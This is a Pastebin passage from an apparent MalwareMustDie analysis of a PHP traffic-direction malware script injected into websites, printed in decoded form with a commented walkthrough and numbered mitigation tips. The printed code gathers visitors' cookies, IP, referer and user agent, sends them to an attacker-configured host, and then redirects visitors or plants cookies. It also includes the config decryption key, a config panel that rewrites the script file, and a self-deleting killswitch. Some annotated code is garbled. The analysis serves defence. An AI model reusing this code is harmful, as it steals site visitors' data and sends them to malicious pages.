  559. if (!$fp)
  560.   {
  561.     $res = 1;
  562.   }
  563. else
  564.   {
  565.     $t_dom  = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  566.     $t_ref  = urlencode($_SERVER['HTTP_REFERER']);
  567.     $t_ip   = urlencode($_SERVER['REMOTE_ADDR']);
  568.     $t_prox = 'no';
  569.     if ($_SERVER['HTTP_X_FORWARDED_FOR'])
  570.       {
  571.         $t_prox = 'yes';
  572.       }
  573.     $t_agent = urlencode($_SERVER['HTTP_USER_AGENT']);
  574.     foreach ($_COOKIE as $c['key'] => $val)
  575.       {
  576.         $t_cookie = $t_cookie . '&' . $c['key'] . = . $val;
  577.       }
  578.     $t_cookie = urlencode($t_cookie);
  579.     if (empty($t_cookie))
  580.       {
  581.         $t_cookie = urlencode($_SERVER['QUERY_STRING']);
  582.       }
  583.     $out = GET . $c['url'] . '?dom=' . $t_dom . '&ref=' . $t_ref . '&ip=' . $t_ip . '&prox=' . $t_prox . '&agent=' . $t_agent . '&cookie=' . $t_cookie . '&esdid=' . $c[id] .  'HTTP/1.0';
  584.     $out .= 'Host: ' . $dhost .``;
  585.     $out .= 'Connection: Close';
  586.     fwrite($fp, $out);
  587.     while (!feof($fp))
  588.       {
  589.         $str = fgets($fp, 128);
  590.         $ch .= $str;
  591.         if ($str == '' && empty($he))
  592.           {
  593.             $he = 'do';
  594.           }
  595.         if ($he == 'do')
  596.           {
  597.             $goto .= $str;
  598.           }
  599.       }
  600.     fclose($fp);
  601.   }
  602. $goto = substr($goto, 2);
  603. $ch   = explode(' ', $ch);
  604. if ($res)
  605.   {
  606.     $goto = $c['lin'];
  607.   }
  608. if ($ch[1] == '200')
  609.   {
  610.   }
  611. else
  612.   {
  613.     $goto = $c['lin'];
  614.   }
  615. $gotoe = explode('://', $goto);
  616. If ($gotoe[0] == 'http')
  617.   {
  618.     header('HTTP/1.1 302 Found');
  619.     header('Location: '. $goto);
  620.   }
  621. $goto_body = substr($goto, 7);
  622. If ($gotoe[0] == 'cook')
  623.   {
  624.     $gotoee = explode('&', $goto_body);
  625.     foreach ($gotoee as $setcook)
  626.       {
  627.         $set = explode('=', $setcook);
  628.         setcookie($set[0], $set[1]);
  629.       }
  630.   }
  631. If ($gotoe[0] == 'echo')
  632.   {
  633.     echo $goto_body;
  634.   }
  635. ?>
  636.  
  637. #===============================================================
  638. # PART TO PEEL & BREAK THE CODE INTO PIECES
  639. # AND UNDERSTAND THE PROCESS!!! < IMPORTANT!! SINCE YOU WILL SEE
  640. # SOME SUGGESTED WAYS/OPPORTUNITY TO MITIGATE THIS THREAT!!
  641. #===============================================================
  642.  
  643. <?php
  644. #================================================
  645. #STEP 1 - WHAT'S $c? <-- the key of evertything...
  646. #================================================
  647. // Run the below ' get the $c
  648. // It has to be a key and Sality.  <==== MITIGATE #1
  649. // The key is important:
  650. // $key = 'kLQc8Y2g';
  651. // The original function string_cpt() is the copy-paste code used by these stupid moronz
  652. // IS in the injection tool they have, so it won't change much!!  // <==== MITIGATE #2
  653.  
  654. $cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';
  655.  
  656. // No no ! dont just base64 the above itself, but use the function below!
  657.  
  658. $key = 'kLQc8Y2g';
  659. function string_cpt($String, $Password)
  660.   {
  661.     $Salt   = 'RDrq';
  662.     $StrLen = strlen($String);
  663.     $Seq    = $Password;
  664.     $Gamma  = '';
  665.     while (strlen($Gamma) < $StrLen)
  666.       {
  667.         $Seq = pack('H*', sha1($Gamma . $Seq . $Salt));
  668.         $Gamma .= substr($Seq, 0, 8);
  669.       }
  670.     return $String ^ $Gamma;
  671.   }
  672.  
  673. $c    = unserialize(string_cpt(base64_decode($cfg), $key));
  674.  
  675. // Add this code and run it/..
  676.  
  677. //print "$cfg<br>";
  678. //print "$key<br>";
  679. print "$c";
  680.  
  681. / output:
  682.  
  683. Array  // <======= Hold this..substitute every $c in the above code to this string. :-)
  684.  
  685.  
  686. #================================
  687. #STEP 2 - REQUEST CONDITIONS
  688. #================================
  689.  
  690. // There are 3 ways to request:
  691. // "Config", "Setconfig" and "KillSwitch"
  692. //  Config = setting params, Setconfig storing them into file, Killswitch = self destroy & runs..
  693. // Codez:
  694. # if ($mode == 'config' AND Array['key'] == $_REQUEST['key'])
  695. # if ($mode == 'setconfig' AND Array['key'] == $_REQUEST['key']) {
  696. # if ($mode == "killswitch" AND Array[key] == $_REQUEST[key])  //<========== MITIGATE #3
  697.  
  698. #================================
  699. #STEP 3 - PEEL THE CODE
  700. #================================
  701.  
  702. # CONDITION: CONFIGURATION...
  703. # if ($mode == 'config' AND Array['key'] == $_REQUEST['key'])
  704.  
  705. //Noted↓
  706. $c = 'Array';
  707.  
  708. echo '<form name="form1" method="post" action=?mode=setconfig&key=' . $_REQUEST['key'] . '><pre>
  709. TDS:     <input type="text" name="ptds" value="' . Array['url'] . '">  TDS IP:  <input type="text" name="ptdsip" value="' . Array['ip'] . '">
  710. KEY:     <input type="text" name="pkey" value="' . Array['key'] . '">  Reserve: <input type="text" name="pto" value="' . Array['lin'] . '">
  711. ID:      <input type="text" name="pesdid" value="' . Array['id'] . '">  <input type="submit" name="Submit" value="ok"></pre>
  712. </form>';
  713.  
  714. // output is as per images below:
  715. // And the bad actor use this interface to config the scam of esd.php
  716.  
  717.         +-------------------+            +---------------+
  718.  TDS:   |                   |   TDSIP:   |               |
  719.         +-------------------+            +---------------+
  720.  KEY:   |                   |   RESERVE: |               |
  721.         +-------------------+            +---------------+
  722.  ID:    |                   |   +-----+
  723.         +-------------------+   | OK  |     // <========= MITIGATE #4, Block the form submit
  724.                                 +-----+                                if you dont need it..
  725.  
  726. // +------------------------------------------
  727. # NEXT CONDITION: SETTING A CONFIG...
  728. # if ($mode == 'setconfig' AND Array['key'] == $_REQUEST['key']) {
  729.  
  730. $sn = explode('/', $_SERVER['SCRIPT_NAME']);
  731. foreach ($sn as $snn) {
  732.         $scr = $snn;
  733.     }
  734.  
  735. // What are those?? Just print them out..
  736. // print "$sn<br>";print "$snn<br>"; print "$scr<br>";
  737. //Array
  738. //index.php    <========= MITIGATE #5
  739. //index.php   // Destination filename it is..
  740.  
  741. // Next...
  742. // Get the filename... some index.php or blah.php
  743.  
  744.     $getlpa = file($scr);
  745.     $strng  = $getlpa[0];
  746.     $file   = file($scr)
  747.  
  748. // Get the request condition for setconfig..
  749.  
  750.         if ($i == 0) {
  751.             Array['url'] = $_POST['ptds'];     // <==== MITIGATE #6
  752.             Array['ip'] = $_POST['ptdsip'];
  753.             Array['lin'] = $_POST['pto'];
  754.             Array['id'] = $_POST['pesdid'];
  755.             Array['key'] = $_POST['pkey'];
  756.  
  757. // execute the formulation for setconfig...
  758.  
  759.             $cfg                = base64_encode(string_cpt(serialize(Array), $key));
  760.             $file[$i]           = "<?\$cfg='$cfg'; ?>\n";
  761.  
  762. // so we know that $c represent array of string to handle the input...
  763. // and they save the config as a file locally here:
  764.  
  765.     $fp = fopen($scr, 'w');
  766.     if (fputs($fp, implode('', $file)))    <======= MITIGATE #7 PHP Setting..
  767.        die('Saved.');
  768.     fclose($fp);
  769.   }
  770.  
  771. //------------------------------------------
  772. # NEXT CONDITION: "THE REAL DEAL.."
  773. # if ($mode == "killswitch" AND $c[key] == $_REQUEST[key])
  774. # This killswitch mode is very important for executing the TDS, yet-
  775. # at the same time can be used to neutralized the attack!!
  776.  
  777. // The deletion of the file performed:
  778.  
  779.     chmod('777', $_SERVER['SCRIPT_FILENAME']);
  780.     if (unlink($_SERVER['SCRIPT_FILENAME']))
  781.  
  782. #================================
  783. # WEAPONIZED STARTS FROM HERE...
  784. #================================
  785.  
  786. // for condition checked in each incoming url...
  787.  
  788. $dom   = explode('/', Array['url']);  
  789. $dom   = $dom[2];
  790. $dhost = $dom;
  791.  
  792. // Get the domains...
  793.  
  794. if ($c['ip'])
  795.   {
  796.     $dom = $c['ip'];
  797.   }
  798.  
  799. // $fp is the opening HTTP connection to a domain ($dom) via Port 80...
  800.  
  801. $fp = fsockopen($dom, 80, $errno, $errstr, 2);   //  <========= MITIGATE #8 , #Blocking can be applied..
  802.  
  803. // Check if the connection can not be open...
  804.  
  805. if (!$fp)
  806.   {
  807.     $res = 1;
  808.  
  809. // If connected, grabbing the request, referer, remote IP & proxy into:
  810.  
  811.     $t_dom  = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  812.     $t_ref  = urlencode($_SERVER['HTTP_REFERER']);
  813.     $t_ip   = urlencode($_SERVER['REMOTE_ADDR']);
  814.  
  815. // initialing the proxy set to no...
  816.  
  817.     $t_prox = 'no';
  818.  
  819. // Except if it detected the X-FORWARD code requested...turn it to yes..
  820.  
  821.     if ($_SERVER['HTTP_X_FORWARDED_FOR'])            // <==== MITIGATE #9, avoid "Plain" X-FORWARDED_FOR
  822.       {
  823.         $t_prox = 'yes';
  824.       }
  825.  
  826. // Fill the cookies if it's empty...     <====== MITIGATE 10 "Disable Cookie"
  827.  
  828.     $t_cookie = urlencode($t_cookie);
  829.     if (empty($t_cookie))
  830.       {
  831.         $t_cookie = urlencode($_SERVER['QUERY_STRING']);
  832.       }
  833.  
  834. // THIS PART IS PREPARATION FOR TDS/FORWARDING...
  835. // Assemble redirection forward URI via HTTP GET...
  836.  
  837.     $out = GET . $c['url'] . '?dom=' . $t_dom . '&ref=' . $t_ref . '&ip=' . $t_ip . '&prox=' . $t_prox . '&agent=' . $t_agent . '&cookie=' . $t_cookie . '&esdid=' . $c[id] .  'HTTP/1.0';
  838.     $out .= 'Host: ' . $dhost .``;
  839.     $out .= 'Connection: Close';
  840.  
  841. #================================
  842. # THE FORWARDING, THE "ACTION"...
  843. #================================
  844.  
  845. // Forwarding request! Open port snd write the URI..
  846.     fwrite($fp, $out);             // <==== MITIGATE #10  Block fwrite usage if you don't need it..
  847.  
  848.  
  849. // Keep trying on connecting until end..
  850. // And feed the data into the $ch (128 bytes)
  851. // and close it...
  852.  
  853.    while (!feof($fp))
  854.       {
  855.         $str = fgets($fp, 128);
  856.         $ch .= $str;
  857.         if ($str == '' && empty($he))
  858.           {
  859.             $he = 'do';
  860.           }
  861.         if ($he == 'do')
  862.           {
  863.             $goto .= $str;
  864.           }
  865.       }
  866.     fclose($fp)
  867.  
  868. // Write it down...the fix request form, into $goto
  869.  
  870. $goto = substr($goto, 2);
  871. $ch   = explode(' ', $ch);
  872. if ($res)
  873.   {
  874.     $goto = $c['lin'];
  875.   }
  876.  
  877. //...if met good response 200...
  878.  
  879. if ($ch[1] == '200')
  880.   {
  881.   }
  882. else
  883.   {
  884.     $goto = $c['lin'];
  885.   }
  886.  
  887. #====================================================
  888. # DIRECT FORWARD, 302 FORWARD, COOKIE FLAGGING
  889. #====================================================
  890.  
  891. // there you go...
  892. // The redirection...if you're good to go (condition:http)
  893.  
  894. $gotoe = explode('://', $goto);
  895.  
  896.  
  897. If ($gotoe[0] == 'http')
  898.   {
  899.     header('HTTP/1.1 302 Found');     <======== MITIGATE #11 // FILTER 302 (in your server HTACCESS)
  900.    header('Location: '. $goto);
  901.   }
  902.  
  903. // Cook the cookie :-)) (condition:cook)
  904.  
  905. $goto_body = substr($goto, 7);
  906. If ($gotoe[0] == 'cook')
  907.   {
  908.     $gotoee = explode('&', $goto_body);
  909.     foreach ($gotoee as $setcook)
  910.       {
  911.         $set = explode('=', $setcook);
  912.         setcookie($set[0], $set[1]); // <---Here's the #cookiebomb base flagging concept.
  913.       }
  914.   }
  915.  
  916. // If gotoe contains (echo)
  917.  
  918. If ($gotoe[0] == 'echo')
  919.   {
  920.     echo $goto_body;
  921.   }
  922. ?>
  923.  
  924. ------------
  925. #MalwareMustDie
  926. #Decoded & Explained by @unixfreaxjp
  927. MalwareMustDie, NPO | http://malwaremustdie.org
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top